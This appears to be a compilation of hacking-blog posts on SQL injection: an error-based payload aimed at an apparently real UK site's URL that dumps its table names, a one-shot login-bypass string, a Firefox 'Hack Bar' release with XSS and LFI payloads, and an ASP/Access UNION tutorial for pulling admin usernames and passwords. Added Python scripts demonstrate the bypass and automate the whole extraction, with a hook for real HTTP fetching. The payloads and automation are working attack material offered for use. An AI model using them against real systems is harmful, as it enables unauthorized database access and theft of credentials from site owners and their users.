Blank output. The 0x00 gets converted to a real null byte, which "deletes" our output. Let's replace it by 0x01.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from((select (@) from (select(@:=0),(select (@) from (information_schema.tables) where (table_schema>=@)and (table_schema<>0x696e666f726d6174696f6e5f736368656d61)and (@)in (@:=concat(@,0x203a20,table_name))))x))k)p))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `p`.`(@)` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `(' value found during parsing }

Let's get rid of the unnecessary things and, as before, give our output an empty alias.

Code:
=======================================================================
http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select((select@''from(select@:=0x01 ,(select@ from information_schema.tables where table_schema!='information_schema'and@:=concat(@,0x203a20,table_name)))p))'')f)x ))
=======================================================================
{ Qusers - Error #1367: Illegal non geometric '(select `` from (select ' : blocklist : log_login : pernodmajorwinners : pernodmanagement : pernodmatches : pernodmessages : pernodnews : pernodpolls : pernodtopics : pernoduser' AS `` from (' value found during parsing }

And we have DIOS for non-geometric error based injection.

Auth Bypass In One Shot

Sometimes we need to bypass an admin panel, and we do that with or 1=1. The problem is that we don't know whether the field is used as an integer, a single-quoted string or a double-quoted string. But does it really matter?
Let's check this query:

Code:
=======================================================================
or 1-- -' or 1 or '1"or 1 or"
=======================================================================
Take any of the three cases. If the field is an integer, the query behind the URL plus our injection looks like this:

Code:
=======================================================================
SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username='' AND password=''
=======================================================================

The "or 1-- -" part takes effect: it makes the condition true and the comment discards the rest of the query. Now the regular (single-quoted) string:

Code:
=======================================================================
SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' .....
=======================================================================

Here the "or 1" in the middle makes the condition true, and the remaining pieces are swallowed as string literals on either side of it. The same happens with double quotes:

Code:
=======================================================================
SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" " .....
=======================================================================
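To see the one-shot payload succeed in all three contexts, here is an added example (not part of the original post): it builds the three vulnerable login queries by string formatting, as a careless application would, and runs them against an in-memory SQLite table. The login table, its one account and the three query templates are constructed for the demonstration. SQLite parses the integer and single-quoted cases exactly as MySQL does; double-quoted string literals are MySQL behaviour that SQLite only accepts when built with its legacy DQS option, so that case reports "skipped" on builds without it. A parameterized query is included to show the same payload being treated as plain data.

```python
import sqlite3

# The one-shot payload from the post above.
PAYLOAD = "or 1-- -' or 1 or '1\"or 1 or\""

# Three hypothetical vulnerable login queries (constructed for this example),
# one for each way the user-supplied value might be embedded in the WHERE clause.
QUERY_TEMPLATES = {
    "integer": "SELECT * FROM login WHERE id={} AND username='' AND password=''",
    "single":  "SELECT * FROM login WHERE username='{}' AND password=''",
    "double":  "SELECT * FROM login WHERE username=\"{}\" AND password=''",
}


def make_db():
    """In-memory login table holding one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES (1, 'admin', 'correct horse battery')")
    return con


def run_vulnerable(con, context, payload):
    """Embed the payload by string formatting (the bug) and report whether a row came back.

    The post shows the integer case as id=1 followed by the payload, so a real id is
    prefixed there; in the string cases the payload is the whole value.
    Returns True (login bypassed), False (no row) or None (this SQLite build cannot
    parse MySQL-style "..." string literals, so the double-quote case is skipped).
    """
    value = "1 " + payload if context == "integer" else payload
    query = QUERY_TEMPLATES[context].format(value)
    try:
        rows = con.execute(query).fetchall()
    except sqlite3.OperationalError:
        if context == "double":
            return None  # SQLite built without DQS; MySQL always accepts "..." strings
        raise
    return len(rows) > 0


def run_parameterized(con, payload):
    """The fix: the payload is bound as data and never reaches the SQL parser as syntax."""
    rows = con.execute(
        "SELECT * FROM login WHERE username=? AND password=?", (payload, "")
    ).fetchall()
    return len(rows) > 0


def demo():
    """Run the payload through every context and through the parameterized query."""
    con = make_db()
    results = {ctx: run_vulnerable(con, ctx, PAYLOAD) for ctx in QUERY_TEMPLATES}
    results["parameterized"] = run_parameterized(con, PAYLOAD)
    return results


if __name__ == "__main__":
    for name, hit in demo().items():
        state = "bypassed" if hit else ("skipped" if hit is None else "blocked")
        print(f"{name:13s} -> {state}")
```

The three vulnerable queries return the admin row whatever the quoting context, while the parameterized query returns nothing: the payload works because each quoting style turns a different fragment of it into the bare `or 1`, and the only fix that holds across all three is to stop concatenating input into SQL.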

WAFs will always get tricky, the SQLi section will continue to grow, and the human brain will keep providing more and more with less and less. That's my conclusion.
Hope you learned something.
========================================================================

How To fix Live Http Header Reply button

 Live HTTP Header Fixed


===================================================================================
                                                                Reply Button Fixed
===================================================================================
                                 In the Name of ALLAH the Most Beneficent and the Merciful.
                                                               Assalam-o-Alaikom.

LiveHTTPHeader "Reply" Button Fixed.
By r0ot h3x49.

=========================================================================
How To Install?
=========================================================================
1: First install the "Live HTTP Headers" add-on in Firefox.
Here is Link :- Go Now

2: Click the "Help" menu in the browser.

3: Click "Troubleshooting Information".

4: Click the "Show Folder" button.

5: Open the "Extensions" folder.

6: Open the folder "{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a}" (this is the Live HTTP Headers add-on).

7: Open the "Chrome" folder.

8: Replace "livehttpheaders" with the given patch and enjoy.






Click Here To Download :- Download Now

Note:-

           "Close your Firefox browser before replacing "livehttpheaders.rar" with this one, then replace it, start Firefox again and check."

Special Thnx to :---
                  Kazam Veeru <3 & Yogesh Bhagat <3

Gretz to :---
(Ashx khan , Rehan Manzoor , Mak Man , Janus Sloven , Anas Ali , Base64 , Behroz , Amir Dz , Zen bro , Dante bro and all my hacker Frnds... )

New Hack Bar Version (updated)

                                       Hack Bar New Version


===================================================================================
                                                                r0ot-k4jj1-v1.6.5
===================================================================================
                                 In the Name of ALLAH the Most Beneficent and the Merciful.
                                                               Assalam-o-Alaikom.

Hack Bar Version 1.6.5.
By r0oth3x49 & K44ji gujj4r.

=========================================================================
What's New?
=========================================================================
1:- Added some variable method queries.
2:- Added a new look and design to this version.
3:- Added payloads for LFI.
4:- Added payloads for XSS.
5:- Added a Source Code Viewer add-on shortcut button.

=========================================================================
6:- Added Links to:-
=========================================================================
a: Official Blog
b: Security Idiots
c: Add-on link for Source code viewer etc.


=========================================================================
Bug Fixes
=========================================================================
1:- Fixed the Replace button.
2:- Fixed base64spacer.
3:- Fixed the LiveHTTPHeader "Reply" button.

Special Thanks to.
    Yogesh Bhagat (Sweetyow) & 
Janus Slovan For testing. 
Greetz To:-
            Ashx khan , MakMan , Zen , Rummy Khan , AnAs Ali , Amir_Dz , 

           Base64 , Ur0xm , Sn00.py , Shahmeer Amir , Danish Iqbal.
=========================================================================
./r0ot@H3X49

Click Here to Download :- Download Now

=========================================================================
Some Pics
=========================================================================
To make it look like this, just change your default Firefox theme to any theme with a black background.
One link to such a theme is also given in this hackbar: go to the "UNION BASED" menu; the label named "LINKS" holds the "Theme" link.

New Hack bar (screenshots)

Saturday, April 4, 2015

MSSQL [asp] Sql injection

SQL injection on an ASP site works much like it does on PHP, with a few changes.

First of all we need a site that is vulnerable and runs on .asp.

So assume we have a site with the name


Code:
http://www.target.com/


Now find a page where the site is vulnerable to SQL injection.

You can check for the vulnerability by adding a single quotation mark '
at the end of the URL, like

Code:
http://www.target.com/product.asp?id=13'


If you get an error like this...

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
then the site is vulnerable to SQL injection. Note that the message names the Microsoft Access ODBC driver, so the back end behind this particular ASP page is an Access database; a SQL Server back end raises the same 80040e14 error class but names its own driver in the text. Now we are going to find the number of columns. Normally we use -- at the end of the string, but in this case we will be using #.

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose the site has 10 columns. When you use the query "order by 1#" (without the double quotation marks) you get no error and the page loads normally, but when you use "order by 11#" you get an error. That tells you the site has 10 columns.

So we will have an error on this query

Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error.

Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns.

Now we will write the query as...

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#


In the next step we need a table name in order to find the largest visible column number. In a simple (MySQL) injection we use union select 1,2,3,4,5,6-- and a number appears on the page that we can use to pull information; here the driver refuses a SELECT without a FROM clause, so we need a real table name before any column number shows up.

So to get that number we add a table name after union select 1,2,3,4,5,6,7,...,10.

Scripts for enumerating table names do not work here most of the time (I tried several), so we guess table names manually. Common names are admin, tbladmin, tbl_admin, user, users, login, info, email, etc. Suppose the site has an admin table and the page renders. Now our URL looks like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#


After this we get the numbers of the visible columns, which we can use to pull data from the site. Suppose columns 3, 6 and 7 are visible.

We will use 3: put a column name in place of the 3 in the string and the page prints that column's value, so we can get the username and password.

Now our URL will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose we now get a username in place of the number 3.

Then swap in the name of the password column
and you get the password ;)
The URL will be like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#

Author : LAFANGA
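The whole procedure above (quote test, ORDER BY column count, table-name guessing, visible-column discovery, column dump) as one script, added here as an example and not part of LAFANGA's post. Because there is no target to hit, fake_page() is a constructed stand-in that answers the way the Access-backed product.asp in the post would: it errors on a stray quote, on ORDER BY past ten columns, on a UNION without a known table and on unknown column names, and it prints union columns 3, 6 and 7 in the page. The URL, the admin table's contents and its column names are assumptions for the demonstration; to use the attacker-side functions for real, pass a fetch function that retrieves the URL over HTTP (URL-encoding the spaces and the #) against a target you are authorised to test.

```python
import re

ERROR_TEXT = "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'"

# ---- constructed stand-in for the vulnerable page (no real site involved) ----
FAKE_COLUMN_COUNT = 10
FAKE_TABLES = {"admin": {"name": "administrator", "passwords": "s3cret"}}
FAKE_VISIBLE_SLOTS = (3, 6, 7)  # 1-based union columns the page template prints


def fake_page(url):
    """Answer like product.asp?id=<input> would, without any network access."""
    payload = url.split("id=", 1)[1]
    m = re.fullmatch(r"13 order by (\d+)#", payload)
    if m:
        return "product 13" if int(m.group(1)) <= FAKE_COLUMN_COUNT else ERROR_TEXT
    m = re.fullmatch(r"13 union select ([^#]+?)(?: from (\w+))?#", payload)
    if m:
        cols, table = m.group(1).split(","), m.group(2)
        # Access needs a FROM clause, the table must exist and column counts must match
        if table not in FAKE_TABLES or len(cols) != FAKE_COLUMN_COUNT:
            return ERROR_TEXT
        row, values = FAKE_TABLES[table], []
        for c in cols:
            if c.isdigit():
                values.append(c)
            elif c in row:
                values.append(row[c])
            else:
                return ERROR_TEXT  # unknown column name
        return "product 13 | " + " | ".join(values[i - 1] for i in FAKE_VISIBLE_SLOTS)
    return ERROR_TEXT if "'" in payload else "product 13"


# ---- attacker side: the steps of the post, driven by any fetch(url) -> html ----
def is_injectable(fetch, base):
    """Step 1: a stray quote produces the ODBC syntax error."""
    return ERROR_TEXT in fetch(base + "'")


def find_column_count(fetch, base, max_cols=50):
    """Step 2: ORDER BY n works up to the real column count and errors one past it."""
    for n in range(1, max_cols + 1):
        if ERROR_TEXT in fetch(f"{base} order by {n}#"):
            return n - 1 if n > 1 else None
    return None


def union_url(base, ncols, table, overrides=None):
    """UNION SELECT 1,..,n FROM table, with chosen slots replaced by column names."""
    cols = [str(i) for i in range(1, ncols + 1)]
    for slot, expr in (overrides or {}).items():
        cols[slot - 1] = expr
    return f"{base} union select {','.join(cols)} from {table}#"


def find_table(fetch, base, ncols, candidates):
    """Step 3: guess table names until the UNION stops erroring."""
    for table in candidates:
        if ERROR_TEXT not in fetch(union_url(base, ncols, table)):
            return table
    return None


def find_visible_slots(fetch, base, ncols, table):
    """Step 4: which of the numbers 1..n are rendered in the page."""
    page = fetch(union_url(base, ncols, table))
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", page)]


def dump_column(fetch, base, ncols, table, slot, column):
    """Step 5: put a column name into a visible slot and return the page."""
    return fetch(union_url(base, ncols, table, {slot: column}))


if __name__ == "__main__":
    base = "http://www.target.com/product.asp?id=13"
    n = find_column_count(fake_page, base)
    t = find_table(fake_page, base, n, ["users", "tbl_admin", "admin"])
    slots = find_visible_slots(fake_page, base, n, t)
    print(f"columns={n} table={t} visible={slots}")
    print(dump_column(fake_page, base, n, t, slots[0], "name"))
```

On a real page the baseline response will contain other numbers, so compare the visible-slot scan against a fetch of the unmodified URL and discard numbers that already appear there; the fake page is simple enough not to need that.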